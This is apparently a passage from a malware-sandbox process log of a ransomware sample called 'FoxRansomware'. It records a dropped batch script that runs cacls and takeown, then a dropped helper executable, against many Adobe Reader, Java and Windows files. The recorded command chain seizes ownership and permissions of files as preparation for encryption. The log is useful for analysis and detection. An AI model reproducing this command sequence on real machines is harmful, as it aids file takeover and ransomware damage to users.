C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\StandardBusiness.pdf" /E /G Admin:F /C3⤵PID:3132
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\StandardBusiness.pdf"3⤵
- Modifies file permissions
PID:3152
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c uSDT8H9y.exe -accepteula "StandardBusiness.pdf" -nobanner3⤵
- Loads dropped DLL
PID:3092 -
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\uSDT8H9y.exeuSDT8H9y.exe -accepteula "StandardBusiness.pdf" -nobanner4⤵
- Executes dropped EXE
PID:3068
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\uSDT8H9y.exeuSDT8H9y.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:3224
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\vmDcYnNc.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\ENUtxt.pdf""2⤵
- Loads dropped DLL
PID:2028 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\ENUtxt.pdf" /E /G Admin:F /C3⤵PID:1932
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\ENUtxt.pdf"3⤵
- Modifies file permissions
PID:1940
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c uSDT8H9y.exe -accepteula "ENUtxt.pdf" -nobanner3⤵
- Loads dropped DLL
PID:3300 -
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\uSDT8H9y.exeuSDT8H9y.exe -accepteula "ENUtxt.pdf" -nobanner4⤵
- Executes dropped EXE
PID:3324
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\uSDT8H9y.exeuSDT8H9y.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:2832
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\vmDcYnNc.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\IDTemplates\ENU\AdobeID.pdf""2⤵
- Loads dropped DLL
PID:1728 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\IDTemplates\ENU\AdobeID.pdf" /E /G Admin:F /C3⤵PID:3680
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\IDTemplates\ENU\AdobeID.pdf"3⤵
- Modifies file permissions
PID:3760
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c uSDT8H9y.exe -accepteula "AdobeID.pdf" -nobanner3⤵
- Loads dropped DLL
PID:3768 -
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\uSDT8H9y.exeuSDT8H9y.exe -accepteula "AdobeID.pdf" -nobanner4⤵
- Executes dropped EXE
PID:3776
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\uSDT8H9y.exeuSDT8H9y.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:3808
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\vmDcYnNc.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\PDFSigQFormalRep.pdf""2⤵
- Loads dropped DLL
PID:1872 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\PDFSigQFormalRep.pdf" /E /G Admin:F /C3⤵PID:1060
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\PDFSigQFormalRep.pdf"3⤵
- Modifies file permissions
PID:1560
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c uSDT8H9y.exe -accepteula "PDFSigQFormalRep.pdf" -nobanner3⤵
- Loads dropped DLL
PID:2088 -
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\uSDT8H9y.exeuSDT8H9y.exe -accepteula "PDFSigQFormalRep.pdf" -nobanner4⤵
- Executes dropped EXE
PID:2884
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\uSDT8H9y.exeuSDT8H9y.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:1356
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\vmDcYnNc.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\Dynamic.pdf""2⤵
- Loads dropped DLL
PID:2168 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\Dynamic.pdf" /E /G Admin:F /C3⤵PID:3984
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\Dynamic.pdf"3⤵
- Modifies file permissions
PID:3996
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c uSDT8H9y.exe -accepteula "Dynamic.pdf" -nobanner3⤵
- Loads dropped DLL
PID:3940 -
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\uSDT8H9y.exeuSDT8H9y.exe -accepteula "Dynamic.pdf" -nobanner4⤵
- Executes dropped EXE
PID:3936
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\uSDT8H9y.exeuSDT8H9y.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:3912
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\vmDcYnNc.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\IDTemplates\ENU\DefaultID.pdf""2⤵
- Loads dropped DLL
PID:3872 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\IDTemplates\ENU\DefaultID.pdf" /E /G Admin:F /C3⤵PID:3140
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\IDTemplates\ENU\DefaultID.pdf"3⤵
- Modifies file permissions
PID:3212
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c uSDT8H9y.exe -accepteula "DefaultID.pdf" -nobanner3⤵
- Loads dropped DLL
PID:3104 -
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\uSDT8H9y.exeuSDT8H9y.exe -accepteula "DefaultID.pdf" -nobanner4⤵
- Executes dropped EXE
PID:3136
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\uSDT8H9y.exeuSDT8H9y.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:3124
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\vmDcYnNc.bat" "C:\Program Files\Java\jdk1.7.0_80\jre\bin\server\classes.jsa""2⤵
- Loads dropped DLL
PID:3080 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Java\jdk1.7.0_80\jre\bin\server\classes.jsa" /E /G Admin:F /C3⤵PID:1744
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Java\jdk1.7.0_80\jre\bin\server\classes.jsa"3⤵
- Modifies file permissions
PID:2088
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c uSDT8H9y.exe -accepteula "classes.jsa" -nobanner3⤵
- Loads dropped DLL
PID:3000 -
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\uSDT8H9y.exeuSDT8H9y.exe -accepteula "classes.jsa" -nobanner4⤵
- Executes dropped EXE
PID:1356
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\uSDT8H9y.exeuSDT8H9y.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:1408
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\vmDcYnNc.bat" "C:\Program Files\Microsoft Games\FreeCell\FreeCellMCE.png""2⤵
- Loads dropped DLL
PID:3484 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Microsoft Games\FreeCell\FreeCellMCE.png" /E /G Admin:F /C3⤵PID:1512
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Microsoft Games\FreeCell\FreeCellMCE.png"3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:2068
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c uSDT8H9y.exe -accepteula "FreeCellMCE.png" -nobanner3⤵
- Loads dropped DLL
PID:2188 -
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\uSDT8H9y.exeuSDT8H9y.exe -accepteula "FreeCellMCE.png" -nobanner4⤵
- Executes dropped EXE
PID:2528
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\uSDT8H9y.exeuSDT8H9y.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:2952
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\vmDcYnNc.bat" "C:\Program Files\Microsoft Games\Hearts\HeartsMCE.png""2⤵
- Loads dropped DLL
PID:3520 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Microsoft Games\Hearts\HeartsMCE.png" /E /G Admin:F /C3⤵PID:3684
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Microsoft Games\Hearts\HeartsMCE.png"3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:3780
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c uSDT8H9y.exe -accepteula "HeartsMCE.png" -nobanner3⤵
- Loads dropped DLL
PID:3776 -
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\uSDT8H9y.exeuSDT8H9y.exe -accepteula "HeartsMCE.png" -nobanner4⤵
- Executes dropped EXE
PID:3800
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\uSDT8H9y.exeuSDT8H9y.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:2740
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\vmDcYnNc.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Legal\ENU\eula.ini""2⤵
- Loads dropped DLL
PID:2424 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Legal\ENU\eula.ini" /E /G Admin:F /C3⤵PID:1496
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Legal\ENU\eula.ini"3⤵
- Modifies file permissions
PID:1704
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c uSDT8H9y.exe -accepteula "eula.ini" -nobanner3⤵
- Loads dropped DLL
PID:328 -
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\uSDT8H9y.exeuSDT8H9y.exe -accepteula "eula.ini" -nobanner4⤵
- Executes dropped EXE
PID:1680
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\uSDT8H9y.exeuSDT8H9y.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:2680
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\vmDcYnNc.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\AcroSign.prc""2⤵
- Loads dropped DLL
PID:544 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\AcroSign.prc" /E /G Admin:F /C3⤵PID:4060
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\AcroSign.prc"3⤵
- Modifies file permissions
PID:1692
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c uSDT8H9y.exe -accepteula "AcroSign.prc" -nobanner3⤵
- Loads dropped DLL
PID:756 -
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\uSDT8H9y.exeuSDT8H9y.exe -accepteula "AcroSign.prc" -nobanner4⤵
- Executes dropped EXE
PID:2856
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\uSDT8H9y.exeuSDT8H9y.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:3140
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\vmDcYnNc.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\forms_distributed.gif""2⤵
- Loads dropped DLL
PID:3872 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\forms_distributed.gif" /E /G Admin:F /C3⤵PID:3176
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\forms_distributed.gif"3⤵
- Modifies file permissions
PID:1568
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c uSDT8H9y.exe -accepteula "forms_distributed.gif" -nobanner3⤵
- Loads dropped DLL
PID:3064 -
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\uSDT8H9y.exeuSDT8H9y.exe -accepteula "forms_distributed.gif" -nobanner4⤵
- Executes dropped EXE
PID:3220
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\uSDT8H9y.exeuSDT8H9y.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:2152
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\vmDcYnNc.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviews_sent.gif""2⤵
- Loads dropped DLL
PID:3272 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviews_sent.gif" /E /G Admin:F /C3⤵PID:2708
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviews_sent.gif"3⤵
- Modifies file permissions
PID:2372
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c uSDT8H9y.exe -accepteula "reviews_sent.gif" -nobanner3⤵
- Loads dropped DLL
PID:1608 -
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\uSDT8H9y.exeuSDT8H9y.exe -accepteula "reviews_sent.gif" -nobanner4⤵
- Executes dropped EXE
PID:3036
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\uSDT8H9y.exeuSDT8H9y.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:3452
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\vmDcYnNc.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\stop_collection_data.gif""2⤵
- Loads dropped DLL
PID:868 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\stop_collection_data.gif" /E /G Admin:F /C3⤵PID:3548
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\stop_collection_data.gif"3⤵
- Modifies file permissions
PID:3560
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c uSDT8H9y.exe -accepteula "stop_collection_data.gif" -nobanner3⤵
- Loads dropped DLL
PID:3592 -
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\uSDT8H9y.exeuSDT8H9y.exe -accepteula "stop_collection_data.gif" -nobanner4⤵
- Executes dropped EXE
PID:3376
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\uSDT8H9y.exeuSDT8H9y.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:3664
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\vmDcYnNc.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\ReadMe.htm""2⤵
- Loads dropped DLL
PID:1592 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\ReadMe.htm" /E /G Admin:F /C3⤵PID:832
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\ReadMe.htm"3⤵
- Modifies file permissions
PID:344
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c uSDT8H9y.exe -accepteula "ReadMe.htm" -nobanner3⤵
- Loads dropped DLL
PID:2244 -
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\uSDT8H9y.exeuSDT8H9y.exe -accepteula "ReadMe.htm" -nobanner4⤵
- Executes dropped EXE
PID:3416
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\uSDT8H9y.exeuSDT8H9y.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:1212
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\vmDcYnNc.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-It.otf""2⤵
- Loads dropped DLL
PID:3692 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-It.otf" /E /G Admin:F /C3⤵PID:1196
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-It.otf"3⤵
- Modifies file permissions
PID:3672
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c uSDT8H9y.exe -accepteula "MinionPro-It.otf" -nobanner3⤵
- Loads dropped DLL
PID:2764 -
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\uSDT8H9y.exeuSDT8H9y.exe -accepteula "MinionPro-It.otf" -nobanner4⤵
- Executes dropped EXE
PID:2912
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\uSDT8H9y.exeuSDT8H9y.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:3644
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\vmDcYnNc.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\ZX______.PFB""2⤵
- Loads dropped DLL
PID:268 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\ZX______.PFB" /E /G Admin:F /C3⤵PID:2820
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\ZX______.PFB"3⤵
- Modifies file permissions
PID:3244
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c uSDT8H9y.exe -accepteula "ZX______.PFB" -nobanner3⤵
- Loads dropped DLL
PID:2740 -
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\uSDT8H9y.exeuSDT8H9y.exe -accepteula "ZX______.PFB" -nobanner4⤵
- Executes dropped EXE
PID:4028
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\uSDT8H9y.exeuSDT8H9y.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:3184
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\vmDcYnNc.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt04.hsp""2⤵
- Loads dropped DLL
PID:3164 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt04.hsp" /E /G Admin:F /C3⤵PID:3268
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt04.hsp"3⤵
- Modifies file permissions
PID:748
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c uSDT8H9y.exe -accepteula "brt04.hsp" -nobanner3⤵
- Loads dropped DLL
PID:616 -
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\uSDT8H9y.exeuSDT8H9y.exe -accepteula "brt04.hsp" -nobanner4⤵
- Executes dropped EXE
PID:1756
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\uSDT8H9y.exeuSDT8H9y.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:1560
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\vmDcYnNc.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\engphon.env""2⤵
- Loads dropped DLL
PID:3568 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\engphon.env" /E /G Admin:F /C3⤵PID:2184
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\engphon.env"3⤵
- Modifies file permissions
PID:3288
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c uSDT8H9y.exe -accepteula "engphon.env" -nobanner3⤵
- Loads dropped DLL
PID:2964 -
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\uSDT8H9y.exeuSDT8H9y.exe -accepteula "engphon.env" -nobanner4⤵
- Executes dropped EXE
PID:3448
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\uSDT8H9y.exeuSDT8H9y.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:3648
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\vmDcYnNc.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CORPCHAR.TXT""2⤵
- Loads dropped DLL
PID:952 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CORPCHAR.TXT" /E /G Admin:F /C3⤵PID:3296
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CORPCHAR.TXT"3⤵
- Modifies file permissions
PID:1624
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c uSDT8H9y.exe -accepteula "CORPCHAR.TXT" -nobanner3⤵
- Loads dropped DLL
PID:2888 -
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\uSDT8H9y.exeuSDT8H9y.exe -accepteula "CORPCHAR.TXT" -nobanner4⤵
- Executes dropped EXE
PID:3048
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\uSDT8H9y.exeuSDT8H9y.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:2640
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\vmDcYnNc.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1250.TXT""2⤵
- Loads dropped DLL
PID:548 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1250.TXT" /E /G Admin:F /C3⤵PID:1940
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1250.TXT"3⤵
- Modifies file permissions
PID:616
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c uSDT8H9y.exe -accepteula "CP1250.TXT" -nobanner3⤵
- Loads dropped DLL
PID:2624 -
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\uSDT8H9y.exeuSDT8H9y.exe -accepteula "CP1250.TXT" -nobanner4⤵
- Executes dropped EXE
PID:2428
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\uSDT8H9y.exeuSDT8H9y.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:664
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\vmDcYnNc.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\LogTransport2.exe""2⤵
- Loads dropped DLL
PID:3432 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\LogTransport2.exe" /E /G Admin:F /C3⤵PID:3820
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\LogTransport2.exe"3⤵
- Modifies file permissions
PID:3728
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c uSDT8H9y.exe -accepteula "LogTransport2.exe" -nobanner3⤵
- Loads dropped DLL
PID:3832 -
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\uSDT8H9y.exeuSDT8H9y.exe -accepteula "LogTransport2.exe" -nobanner4⤵
- Executes dropped EXE
PID:1708
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\uSDT8H9y.exeuSDT8H9y.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:1732
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\vmDcYnNc.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\bl.gif""2⤵
- Loads dropped DLL
PID:2788 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\bl.gif" /E /G Admin:F /C3⤵PID:1964
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\bl.gif"3⤵
- Modifies file permissions
PID:3212
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c uSDT8H9y.exe -accepteula "bl.gif" -nobanner3⤵
- Loads dropped DLL
PID:3724 -
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\uSDT8H9y.exeuSDT8H9y.exe -accepteula "bl.gif" -nobanner4⤵
- Executes dropped EXE
PID:3616
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\uSDT8H9y.exeuSDT8H9y.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:2688
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\vmDcYnNc.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\forms_super.gif""2⤵
- Loads dropped DLL
PID:4020 -
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\forms_super.gif"3⤵
- Modifies file permissions
PID:2388
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c uSDT8H9y.exe -accepteula "forms_super.gif" -nobanner3⤵
- Loads dropped DLL
PID:1208
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\uSDT8H9y.exeuSDT8H9y.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:2260
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\vmDcYnNc.bat" "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\en-US\resource.xml""2⤵
- Loads dropped DLL
PID:3604 -
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\en-US\resource.xml" /E /G Admin:F /C3⤵PID:860
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\en-US\resource.xml"3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:616
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c uSDT8H9y.exe -accepteula "resource.xml" -nobanner3⤵
